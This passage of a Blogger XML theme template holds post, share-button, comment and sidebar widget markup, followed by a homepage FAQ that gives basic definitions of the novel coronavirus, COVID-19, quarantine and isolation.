<b:include cond='data:post.commentSource == 1' name='commentsLinkIframe'/>
</span>
</b:if>
</b:includable>
<b:includable id='postFeaturedImage' var='post'>
<!-- Post Featured Image on Index -->
<div class='post-image-wrap'>
<a class='post-image-link' expr:href='data:post.url'>
<b:if cond='data:post.featuredImage'>
<img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage resizeImage 380'/>
<b:else/>
<img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w480/nth.png'/>
</b:if>
</a>
</div>
</b:includable>
<b:includable id='postFooter' var='post'>
<!-- Post Footer Itens -->
<div class='post-footer'>
<!-- Post Labels and Share Buttons -->
<b:include data='post' name='footerBylines'/>
<b:include cond='data:allBylineItems.backlinks' data='post' name='postRelated'/>
</div>
</b:includable>
<b:includable id='postFooterAuthorProfile' var='post'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='postHeader' var='post'>
<b:include cond='data:view.isPost' data='post' name='postBreadcrumbs'/>
<b:include data='post' name='postTitle'/>
<b:include cond='!data:view.isPage' data='post' name='headerByline'/>
</b:includable>
<b:includable id='postJumpLink' var='post'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='postLabels' var='post'>
<b:if cond='data:allBylineItems.labels'>
<b:if cond='data:post.labels'>
<div class='post-labels'>
<b:loop values='data:post.labels' var='label'>
<span class='Label'><a class='label-link' expr:href='data:label.url' rel='tag'><data:label.name/></a></span>
</b:loop>
</div>
</b:if>
</b:if>
</b:includable>
<b:includable id='postLocation'>
<span class='byline post-location'>
<data:byline.label/>
<a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
</span>
</b:includable>
<b:includable id='postMeta' var='post'>
<b:include data='post' name='postMetadataJSON'/>
</b:includable>
<b:includable id='postMetadataJSONImage'>
"image": {
"@type": "ImageObject",
<b:if cond='data:post.featuredImage.isResizable'>
"url": "<b:eval expr='resizeImage(data:post.featuredImage, 1200, "1200:630")'/>",
"height": 630,
"width": 1200
<b:else/>
"url": "https://lh3.googleusercontent.com/ULB6iBuCeTVvSjjjU1A-O8e9ZpVba6uvyhtiWRti_rBAs9yMYOFBujxriJRZ-A=w1200",
"height": 348,
"width": 1200
</b:if>
},
</b:includable>
<b:includable id='postMetadataJSONPublisher'>
"publisher": {
"@type": "Organization",
"name": "Blogger",
"logo": {
"@type": "ImageObject",
"url": "https://lh3.googleusercontent.com/ULB6iBuCeTVvSjjjU1A-O8e9ZpVba6uvyhtiWRti_rBAs9yMYOFBujxriJRZ-A=h60",
"width": 206,
"height": 60
}
},
</b:includable>
<b:includable id='postNavigation' var='post'>
<!-- Post Navigation Item -->
<div class='post-nav'>
<b:if cond='data:newerPageUrl'>
<a class='next-post-link nav-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' rel='next'><data:messages.newer/></a>
<b:else/>
<span class='next-post-link nav-link'><data:messages.newest/></span>
</b:if>
<b:if cond='data:olderPageUrl'>
<a class='prev-post-link nav-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' rel='previous'><data:messages.older/></a>
<b:else/>
<span class='prev-post-link nav-link'><data:messages.oldest/></span>
</b:if>
</div>
</b:includable>
<b:includable id='postPagination'>
<div class='blog-pager' id='blog-pager'>
<b:include cond='data:olderPageUrl' name='nextPageLink'/>
</div>
</b:includable>
<b:includable id='postReactions'>
<span class='byline reactions'>
<span class='reactions-label'>
<data:byline.label/>
</span>
<iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/>
</span>
</b:includable>
<b:includable id='postRelated' var='post'>
<!-- Related Posts -->
<div id='related-wrap'>
<div class='title-wrap'>
<h3><data:messages.youMayLikeThesePosts/></h3>
</div>
<div class='related-ready'>
<b:if cond='data:post.labels'>
<div class='related-tag' expr:data-label='data:post.labels.first.name'/>
<b:else/>
<div class='related-tag' data-label='random'/>
</b:if>
</div>
</div>
</b:includable>
<b:includable id='postShareButtons' var='post'>
<!-- Post ShareButtons -->
<b:if cond='data:allBylineItems.share'>
<div class='post-share'>
<ul class='share-links social social-color'>
<b:class cond='data:blog.isMobileRequest' name='is-mobile'/>
<li class='facebook-f'><a class='facebook' expr:href='"https://www.facebook.com/sharer.php?u=" + data:post.url' onclick='window.open(this.href, 'windowName', 'width=550, height=650, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li>
<li class='twitter'><a class='twitter' expr:href='"https://twitter.com/intent/tweet?via=templatesyard&url=" + data:post.url + "&text=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=550, height=450, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li>
<li class='pinterest-p'><a class='pinterest' expr:href='"https://www.pinterest.com/pin/create/button/?url=" + data:post.url + "&media=" + data:post.featuredImage + "&description=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=735, height=750, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li>
<li class='linkedin'><a class='linkedin' expr:href='"https://www.linkedin.com/shareArticle?url=" + data:post.url' onclick='window.open(this.href, 'windowName', 'width=950, height=650, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li>
<li class='whatsapp whatsapp-desktop'><a class='whatsapp' expr:href='"https://web.whatsapp.com/send?text=" + data:post.title + " | " + data:post.url' onclick='window.open(this.href, 'windowName', 'width=900, height=550, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li>
<li class='whatsapp whatsapp-mobile'><a class='whatsapp' expr:href='"https://api.whatsapp.com/send?text=" + data:post.title + " | " + data:post.url' rel='nofollow' target='_blank'/></li>
<li class='email'><a class='email' expr:href='"mailto:?subject=" + data:post.title + "&body=" + data:post.url' onclick='window.open(this.href, 'windowName', 'width=500, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li>
</ul>
</div>
</b:if>
</b:includable>
<b:includable id='postShortMeta'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='postSummary' var='post'>
<!-- Post Summary -->
<p class='post-snippet'><b:eval expr='data:post.snippets.long snippet { length: 150 }'/></p>
</b:includable>
<b:includable id='postTimestamp' var='post'>
<!-- Post Timestamp -->
<b:if cond='data:allBylineItems.timestamp'>
<span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
</b:if>
</b:includable>
<b:includable id='postTitle' var='post'>
<!-- Post Title Index and Item -->
<b:if cond='data:view.isMultipleItems'>
<h2 class='post-title'>
<a expr:href='data:post.url'><data:post.title/></a>
</h2>
</b:if>
<b:if cond='data:view.isSingleItem'>
<h1 class='post-title'>
<data:post.title/>
</h1>
</b:if>
</b:includable>
<b:includable id='previousPageLink'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='searchMessage'>
<!-- Search Message -->
<b:if cond='data:view.search.query'>
<div class='queryMessage'>
<b:if cond='data:posts.empty'>
<span class='query-info query-error'/><data:view.search.resultsMessageHtml/><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
<b:else/>
<span class='query-info query-success'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
</b:if>
</div>
</b:if>
<b:if cond='data:view.search.label'>
<div class='queryMessage'>
<b:if cond='data:posts.empty'>
<span class='query-info query-error'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
<b:else/>
<span class='query-info query-success'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
</b:if>
</div>
</b:if>
<b:if cond='data:view.isArchive'>
<div class='queryMessage'>
<b:if cond='data:posts.empty'>
<span class='query-info query-error'><data:view.archive.rangeMessage/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
<b:else/>
<span class='query-info query-success'><data:view.archive.rangeMessage/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a>
</b:if>
</div>
</b:if>
<b:if cond='data:view.isError'>
<div class='errorWrap'>
<h3>404</h3>
<h4><data:messages.theresNothingHere/></h4>
<p><data:navMessage/></p>
<a class='homepage' expr:href='data:blog.homepageUrl'><i class='fa fa-home'/> <data:messages.home/></a>
</div>
</b:if>
<b:if cond='data:view.isMultipleItems and data:posts.empty'><div class='queryEmpty'><data:messages.noResultsFound/></div></b:if>
</b:includable>
<b:includable id='sharingButton'>
<span expr:aria-label='data:platform.shareMessage' expr:class='"sharing-platform-button sharing-element-" + data:platform.key' expr:data-href='data:shareUrl + "&target=" + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'>
<b:include name='sharingPlatformIcon'/>
<span class='platform-sharing-text'><data:platform.name/></span>
</span>
</b:includable>
<b:includable id='sharingButtonContent'>
<div class='flat-icon-button ripple'>
<b:include name='shareIcon'/>
</div>
</b:includable>
<b:includable id='sharingButtons'>
<div class='sharing' expr:aria-owns='"sharing-popup-" + data:sharingId' expr:data-title='data:shareTitle'>
<button class='sharing-button touch-icon-button' expr:aria-controls='"sharing-popup-" + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-button-" + data:sharingId' role='button'>
<b:include name='sharingButtonContent'/>
</button>
<b:include name='sharingButtonsMenu'/>
</div>
</b:includable>
<b:includable id='sharingButtonsMenu'>
<div class='share-buttons-container'>
<ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-popup-" + data:sharingId' role='menu'>
<b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p => p.key not in {"blogThis"})' var='platform'>
<li>
<b:include name='sharingButton'/>
</li>
</b:loop>
<li aria-hidden='true' class='hidden'>
<b:include name='otherSharingButton'/>
</li>
</ul>
</div>
</b:includable>
<b:includable id='sharingPlatformIcon'>
<b:include data='{ iconClass: ("touch-icon sharing-" + data:platform.key) }' expr:name='data:platform.key + "Icon"'/>
</b:includable>
<b:includable id='threadedCommentForm' var='post'>
<div class='comment-form'>
<a name='comment-form'/>
<b:if cond='data:this.messages.blogComment != ""'>
<p><data:this.messages.blogComment/></p>
</b:if>
<b:include data='post' name='commentFormIframeSrc'/>
<iframe allowtransparency='allowtransparency' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight ?: "90px"' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
<data:post.cmtfpIframe/>
<script type='text/javascript'>
BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>');
</script>
</div>
</b:includable>
<b:includable id='threadedCommentJs' var='post'>
<script async='async' expr:src='data:post.commentSrc' type='text/javascript'/>
<b:template-script inline='true' name='threaded_comments'/>
<script type='text/javascript'>
blogger.widgets.blog.initThreadedComments(
<data:post.commentJso/>,
<data:post.commentMsgs/>,
<data:post.commentConfig/>);
</script>
</b:includable>
<b:includable id='threadedComments' var='post'>
<section class='comments threaded' expr:data-embed='data:post.embedCommentForm' expr:data-num-comments='data:post.numberOfComments' id='comments'>
<a name='comments'/>
<b:include name='commentsTitle'/>
<div class='comments-content'>
<b:if cond='data:post.embedCommentForm'>
<b:include data='post' name='threadedCommentJs'/>
</b:if>
<div id='comment-holder'>
<data:post.commentHtml/>
</div>
</div>
<p class='comment-footer'>
<b:if cond='data:post.allowNewComments'>
<b:include data='post' name='threadedCommentForm'/>
<b:else/>
<data:post.noNewCommentsText/>
</b:if>
</p>
<b:if cond='data:showCmtPopup'>
<div id='comment-popup'>
<iframe allowtransparency='allowtransparency' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
</iframe>
</div>
</b:if>
</section>
</b:includable>
<b:includable id='threadedCommentsDisqus' var='post'>
<script type='text/javascript'>
var disqus_blogger_current_url = "<data:blog.canonicalUrl/>";
if (!disqus_blogger_current_url.length) {
disqus_blogger_current_url = "<data:blog.url/>";
}
var disqus_blogger_homepage_url = "<data:blog.homepageUrl/>";
var disqus_blogger_canonical_homepage_url = "<data:blog.canonicalHomepageUrl/>";
</script>
</b:includable>
</b:widget>
</b:section>
</div>
<!-- Sidebar Wrapper -->
<div id='sidebar-wrapper'>
<b:section class='sidebar common-widget' id='sidebar' name='Sidebar Right' showaddelement='yes'>
<b:widget id='FollowByEmail1' locked='false' title='Newsletter' type='FollowByEmail' version='2' visible='true'>
<b:includable id='main' var='this'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<b:if cond='data:defaultTitle or data:title'>
<h3 class='title'>
<data:title/>
</h3>
</b:if>
<span class='before-text'><data:skin.vars.followByEmail/></span>
<div class='follow-by-email-inner'>
<form action='https://feedburner.google.com/fb/a/mailverify' expr:onsubmit='"window.open(\"https://feedburner.google.com/fb/a/mailverify?uri=" + data:feedPath + "\", \"popupwindow\", \"scrollbars=yes,width=550,height=520\"); return true"' method='post' target='popupwindow'>
<input autocomplete='off' class='follow-by-email-address' expr:placeholder='data:messages.emailAddress' name='email' type='email'/>
<input class='follow-by-email-submit' expr:value='data:messages.subscribe' type='submit'/>
<input expr:value='data:feedPath' name='uri' type='hidden'/>
<input name='loc' type='hidden' value='en_US'/>
</form>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='PopularPosts1' locked='false' title='Popular Posts' type='PopularPosts' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='numItemsToShow'>3</b:widget-setting>
<b:widget-setting name='showThumbnails'>true</b:widget-setting>
<b:widget-setting name='showSnippets'>true</b:widget-setting>
<b:widget-setting name='timeRange'>ALL_TIME</b:widget-setting>
</b:widget-settings>
<b:includable id='main' var='this'>
<b:include name='widget-title'/>
<div class='widget-content'>
<b:loop values='data:posts' var='post'>
<b:include data='post' name='postContent'/>
</b:loop>
</div>
</b:includable>
<b:includable id='blogThisShare'>
<b:with value='"window.open(this.href, \"_blank\", \"height=270,width=475\"); return false;"' var='onclick'>
<b:include name='platformShare'/>
</b:with>
</b:includable>
<b:includable id='bylineByName' var='byline'>
<b:switch var='data:byline.name'>
<b:case value='share'/>
<b:include cond='data:post.shareUrl' name='postShareButtons'/>
<b:case value='comments'/>
<b:include cond='data:post.allowComments' name='postCommentsLink'/>
<b:case value='location'/>
<b:include cond='data:post.location' name='postLocation'/>
<b:case value='timestamp'/>
<b:include cond='not data:view.isPage' name='postTimestamp'/>
<b:case value='author'/>
<b:include name='postAuthor'/>
<b:case value='labels'/>
<b:include cond='data:post.labels' name='postLabels'/>
<b:case value='icons'/>
<b:include cond='data:post.emailPostUrl' name='emailPostIcon'/>
<b:case value='reactions'/>
<b:include cond='data:post.reactionsUrl' name='postReactions'/>
</b:switch>
</b:includable>
<b:includable id='bylineRegion' var='regionItems'>
<b:loop values='data:regionItems' var='byline'>
<b:include data='byline' name='bylineByName'/>
</b:loop>
</b:includable>
<b:includable id='commentsLink'>
<a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
<b:if cond='data:post.numberOfComments > 0'>
<b:message name='messages.numberOfComments'>
<b:param expr:value='data:post.numberOfComments' name='numComments'/>
</b:message>
<b:else/>
<data:messages.postAComment/>
</b:if>
</a>
</b:includable>
<b:includable id='commentsLinkIframe'>
<!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
<b:includable id='emailPostIcon'>
<span class='byline post-icons'>
<!-- email post links -->
<span class='item-action'>
<a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'>
<b:include data='{ iconClass: "touch-icon sharing-icon" }' name='emailIcon'/>
</a>
</span>
</span>
</b:includable>
<b:includable id='facebookShare'>
<b:with value='"window.open(this.href, \"_blank\", \"height=430,width=640\"); return false;"' var='onclick'>
<b:include name='platformShare'/>
</b:with>
</b:includable>
<b:includable id='footerBylines'>
<b:if cond='data:widgets.Blog.first.footerBylines'>
<b:loop index='i' values='data:widgets.Blog.first.footerBylines' var='region'>
<b:if cond='not data:region.items.empty'>
<div expr:class='"post-footer-line post-footer-line-" + (data:i + 1)'>
<b:with value='"footer-" + (data:i + 1)' var='regionName'>
<b:include data='region.items' name='bylineRegion'/>
</b:with>
</div>
</b:if>
</b:loop>
</b:if>
</b:includable>
<b:includable id='googlePlusShare'>
<div class='goog-inline-block google-plus-share-container'>
<g:plusone annotation='inline' expr:href='data:originalUrl.canonical.http' size='medium' source='blogger:blog:plusone'/>
</div>
</b:includable>
<b:includable id='headerByline'>
<b:if cond='data:widgets.Blog.first.headerByline'>
<div class='post-header'>
<div class='post-header-line-1'>
<b:with value='"header-1"' var='regionName'>
<b:include data='data:widgets.Blog.first.headerByline.items' name='bylineRegion'/>
</b:with>
</div>
</div>
</b:if>
</b:includable>
<b:includable id='linkShare'>
<b:with value='"window.prompt(\"Copy to clipboard: Ctrl+C, Enter\", \"" + data:originalUrl + "\"); return false;"' var='onclick'>
<b:include name='platformShare'/>
</b:with>
</b:includable>
<b:includable id='otherSharingButton'>
<span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'>
<b:with value='{key: "sharingOther"}' var='platform'>
<b:include name='sharingPlatformIcon'/>
</b:with>
<span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span>
</span>
</b:includable>
<b:includable id='platformShare'>
<a expr:class='"goog-inline-block sharing-" + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + "&target=" + data:platform.target' expr:onclick='data:onclick ? data:onclick : ""' expr:title='data:platform.shareMessage' target='_blank'>
<span class='share-button-link-text'>
<data:platform.shareMessage/>
</span>
</a>
</b:includable>
<b:includable id='postAuthor'>
<span class='byline post-author vcard'>
<span class='post-author-label'>
<data:byline.label/>
</span>
<span class='fn'>
<b:if cond='data:post.author.profileUrl'>
<meta expr:content='data:post.author.profileUrl'/>
<a class='g-profile' expr:href='data:post.author.profileUrl' rel='author' title='author profile'>
<span><data:post.author.name/></span>
</a>
<b:else/>
<span><data:post.author.name/></span>
</b:if>
</span>
</span>
</b:includable>
<b:includable id='postCommentsLink'>
<span class='byline post-comment-link container'>
<b:include cond='data:post.commentSource != 1' name='commentsLink'/>
</span>
</b:includable>
<b:includable id='postContent' var='post'>
<div class='post'>
<div class='post-content'>
<a class='post-image-link' expr:href='data:post.url'>
<b:if cond='data:post.featuredImage'>
<img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage resizeImage 100'/>
<b:else/>
<img class='post-thumb' expr:alt='data:post.title' src='https://4.bp.blogspot.com/-O3EpVMWcoKw/WxY6-6I4--I/AAAAAAAAB2s/KzC0FqUQtkMdw7VzT6oOR_8vbZO6EJc-ACK4BGAYYCw/w100/nth.png'/>
</b:if>
</a>
<div class='post-info'>
<h2 class='post-title'>
<a expr:href='data:post.url'><data:post.title/></a>
</h2>
<div class='post-meta'>
<span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span>
</div>
</div>
</div>
</div>
</b:includable>
<b:includable id='postJumpLink' var='post'>
<div class='jump-link flat-button'>
<a expr:href='data:post.url fragment "more"' expr:title='data:post.title'>
<b:eval expr='data:blog.jumpLinkMessage'/>
</a>
</div>
</b:includable>
<b:includable id='postLabels'>
<span class='byline post-labels'>
<span class='byline-label'><data:byline.label/></span>
<b:loop index='i' values='data:post.labels' var='label'>
<a expr:href='data:label.url' rel='tag'>
<data:label.name/>
</a>
</b:loop>
</span>
</b:includable>
<b:includable id='postLocation'>
<span class='byline post-location'>
<data:byline.label/>
<a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a>
</span>
</b:includable>
<b:includable id='postReactions'>
<span class='byline reactions'>
<span class='reactions-label'>
<data:byline.label/>
</span>
<iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/>
</span>
</b:includable>
<b:includable id='postShareButtons'>
<div class='byline post-share-buttons goog-inline-block'>
<b:with value='data:sharingId ?: ((data:widget.instanceId ?: "sharing") + "-" + (data:regionName ?: "byline") + "-" + data:post.id)' var='sharingId'>
<!-- Note: 'sharingButtons' includable is from the default Sharing widget markup. -->
<b:include data='{ sharingId: data:sharingId, originalUrl: data:post.url, platforms: data:this.sharing.platforms, shareUrl: data:post.shareUrl, shareTitle: data:post.title, }' name='sharingButtons'/>
</b:with>
</div>
</b:includable>
<b:includable id='postTimestamp'>
<span class='byline post-timestamp'>
<data:byline.label/>
<b:if cond='data:post.url'>
<meta expr:content='data:post.url.canonical'/>
<a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'>
<time class='published' expr:datetime='data:post.date.iso8601' expr:title='data:post.date.iso8601'>
<data:post.date/>
</time>
</a>
</b:if>
</span>
</b:includable>
<b:includable id='sharingButton'>
<span expr:aria-label='data:platform.shareMessage' expr:class='"sharing-platform-button sharing-element-" + data:platform.key' expr:data-href='data:shareUrl + "&target=" + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'>
<b:include name='sharingPlatformIcon'/>
<span class='platform-sharing-text'><data:platform.name/></span>
</span>
</b:includable>
<b:includable id='sharingButtonContent'>
<div class='flat-icon-button ripple'>
<b:include name='shareIcon'/>
</div>
</b:includable>
<b:includable id='sharingButtons'>
<div class='sharing' expr:aria-owns='"sharing-popup-" + data:sharingId' expr:data-title='data:shareTitle'>
<button class='sharing-button touch-icon-button' expr:aria-controls='"sharing-popup-" + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-button-" + data:sharingId' role='button'>
<b:include name='sharingButtonContent'/>
</button>
<b:include name='sharingButtonsMenu'/>
</div>
</b:includable>
<b:includable id='sharingButtonsMenu'>
<div class='share-buttons-container'>
<ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-popup-" + data:sharingId' role='menu'>
<b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p => p.key not in {"blogThis"})' var='platform'>
<li>
<b:include name='sharingButton'/>
</li>
</b:loop>
<li aria-hidden='true' class='hidden'>
<b:include name='otherSharingButton'/>
</li>
</ul>
</div>
</b:includable>
<b:includable id='sharingPlatformIcon'>
<b:include data='{ iconClass: ("touch-icon sharing-" + data:platform.key) }' expr:name='data:platform.key + "Icon"'/>
</b:includable>
<b:includable id='snippetedPostByline'>
<b:with value='(data:widgets first (w => w.type == "Blog")).allBylineItems' var='blogBylines'>
<div class='item-byline'>
<b:with value='data:blogBylines first (i => i.name == "author")' var='byline'>
<b:include cond='data:byline and data:this.postDisplay.showAuthor' data='post' name='postAuthor'/>
</b:with>
<b:with value='data:blogBylines first (i => i.name == "timestamp")' var='byline'>
<b:include cond='data:byline and data:this.postDisplay.showDate' data='post' name='postTimestamp'/>
</b:with>
</div>
</b:with>
</b:includable>
<b:includable id='snippetedPostContent'>
<div class='post-content'>
<b:include cond='data:this.postDisplay.showTitle' name='snippetedPostTitle'/>
<b:include cond='data:this.postDisplay.showDate or data:this.postDisplay.showAuthor' name='snippetedPostByline'/>
<b:include cond='data:this.postDisplay.showSnippet' data='post' name='postSnippet'/>
<b:include cond='data:this.postDisplay.showFeaturedImage and data:post.featuredImage' name='snippetedPostThumbnail'/>
</div>
</b:includable>
<b:includable id='snippetedPostThumbnail'>
<div class='item-thumbnail'>
<a expr:href='data:post.url'>
<b:include data='{ image: data:post.featuredImage, imageSizes: [72, 144], imageRatio: "1:1", sourceSizes: "72px" }' name='responsiveImage'/>
</a>
</div>
</b:includable>
<b:includable id='snippetedPostTitle'>
<b:if cond='data:post.title != ""'>
<h3 class='post-title'><a expr:href='data:post.url'><data:post.title/></a></h3>
</b:if>
</b:includable>
<b:includable id='snippetedPosts'>
<div role='feed'>
<!-- Don't render the post that we're currently already looking at. -->
<b:loop values='data:posts filter (p => p.id != data:view.postId)' var='post'>
<article class='post' role='article'>
<b:include name='snippetedPostContent'/>
</article>
</b:loop>
</div>
</b:includable>
</b:widget>
<b:widget id='HTML7' locked='false' title='Healthy' type='HTML' visible='true'>
<b:widget-settings>
<b:widget-setting name='content'>3/Healthy/post-list</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<div class='widget-content'>
<data:content/>
</div>
</b:includable>
</b:widget>
<b:widget id='HTML2' locked='false' title='Subscribe Us' type='HTML' visible='true'>
<b:widget-settings>
<b:widget-setting name='content'><div class="videoWrapper">
<!-- Copy & Pasted from YouTube -->
<iframe width="560" height="349" src="https://www.youtube.com/embed/r8NxjyN9ch0" frameborder="0" allowfullscreen></iframe>
</div>
<style>
.videoWrapper {
position: relative;
padding-bottom: 56.25%; /* 16:9 */
padding-top: 25px;
height: 0;
}
.videoWrapper iframe {
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
}
</style></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<div class='widget-content'>
<data:content/>
</div>
</b:includable>
</b:widget>
<b:widget id='Label1' locked='false' title='Categories' type='Label' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='sorting'>ALPHA</b:widget-setting>
<b:widget-setting name='display'>LIST</b:widget-setting>
<b:widget-setting name='selectedLabelsList'>Business,Fashion,Healthy,Photography,Technology</b:widget-setting>
<b:widget-setting name='showType'>USER_SELECTED</b:widget-setting>
<b:widget-setting name='showFreqNumbers'>true</b:widget-setting>
</b:widget-settings>
<b:includable id='main' var='this'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='cloud'>
<b:loop values='data:labels' var='label'>
<span class='label-size'>
<b:class expr:name='"label-size-" + data:label.cssSize'/>
<a class='label-name' expr:href='data:label.url'>
<data:label.name/>
<b:if cond='data:this.showFreqNumbers'>
<span class='label-count'><data:label.count/></span>
</b:if>
</a>
</span>
</b:loop>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<b:class expr:name='data:this.display + "-label"'/>
<b:include cond='data:this.display == "list"' name='list'/>
<b:include cond='data:this.display == "cloud"' name='list'/>
</div>
</b:includable>
<b:includable id='list'>
<ul>
<b:loop values='data:labels' var='label'>
<li>
<a class='label-name' expr:href='data:label.url'>
<data:label.name/>
<b:if cond='data:this.showFreqNumbers'>
<span class='label-count'><data:label.count/></span>
</b:if>
</a>
</li>
</b:loop>
</ul>
</b:includable>
</b:widget>
<b:widget id='Label2' locked='false' title='Tags' type='Label' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='sorting'>ALPHA</b:widget-setting>
<b:widget-setting name='display'>CLOUD</b:widget-setting>
<b:widget-setting name='selectedLabelsList'/>
<b:widget-setting name='showType'>ALL</b:widget-setting>
<b:widget-setting name='showFreqNumbers'>false</b:widget-setting>
</b:widget-settings>
<b:includable id='main' var='this'>
<b:include name='widget-title'/>
<b:include name='content'/>
</b:includable>
<b:includable id='cloud'>
<b:loop values='data:labels' var='label'>
<span class='label-size'>
<b:class expr:name='"label-size-" + data:label.cssSize'/>
<a class='label-name' expr:href='data:label.url'>
<data:label.name/>
<b:if cond='data:this.showFreqNumbers'>
<span class='label-count'><data:label.count/></span>
</b:if>
</a>
</span>
</b:loop>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<b:class expr:name='data:this.display + "-label"'/>
<b:include cond='data:this.display == "list"' name='list'/>
<b:include cond='data:this.display == "cloud"' name='list'/>
</div>
</b:includable>
<b:includable id='list'>
<ul>
<b:loop values='data:labels' var='label'>
<li>
<a class='label-name' expr:href='data:label.url'>
<data:label.name/>
<b:if cond='data:this.showFreqNumbers'>
<span class='label-count'><data:label.count/></span>
</b:if>
</a>
</li>
</b:loop>
</ul>
</b:includable>
</b:widget>
</b:section>
</div>
</div>
</div>
<div class='clearfix'/>
<b:if cond='data:view.isHomepage'>
<div class='faq-toggle'>
<div class='container row'>
<div class='faq-title-sec'>
<h1>
FREQUENTLY ASKED QUESTIONS</h1>
<p>
Here You Will Find The Answers Of Your Most Asked Questions</p>
</div>
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>1. What is novel corona virus?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
Coronaviruses are a large family of viruses which may cause illness in animals or humans. In humans, several coronaviruses are known to cause respiratory infections ranging from the common cold to more severe diseases such as Middle East Respiratory Syndrome (MERS) and Severe Acute Respiratory Syndrome (SARS). The most recently discovered coronavirus causes coronavirus disease COVID-19.</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>2. What is COVID-19?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
COVID-19 is the infectious disease caused by the most recently discovered coronavirus. This new virus and disease were unknown before the outbreak began in Wuhan, China, in December 2019.</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>3. What is Quarantine?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
separates and restricts the movement of people who were exposed to a contagious disease to see if they become sick. These people may have been exposed to a disease and do not know it, or they may have the disease but do not show symptoms.</p>
</div>
</div>
<!-- END OF TOGGLE -->
<div class='toggle'>
<div class='toggle-title'>
<h3>
<i/>
<span class='title-name'>4. What is Isolation?</span>
</h3>
</div>
<div class='toggle-inner'>
<p>
The separation of a person or group of people known or reasonably believed to be infected with a communicable disease and potentially infectious from those who are not infected to prevent spread of the communicable disease. Isolation for public health purposes may be voluntary or compelled by federal, state, or local public health order.</p>
</div>
</div>
<!-- END OF TOGGLE -->
